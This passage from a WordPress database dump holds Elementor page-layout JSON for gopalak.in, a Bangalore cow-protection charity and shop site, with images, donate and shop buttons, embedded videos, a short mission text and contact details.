Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\\n\\n\\n\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11106,1846,'_elementor_page_assets','a:0:{}'),(11108,1847,'_elementor_edit_mode','builder'),(11109,1847,'_elementor_template_type','wp-page'),(11110,1847,'_elementor_version','3.7.8'),(11111,1847,'_wp_page_template','elementor_canvas'),(11112,1847,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\\n\\n\\n\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\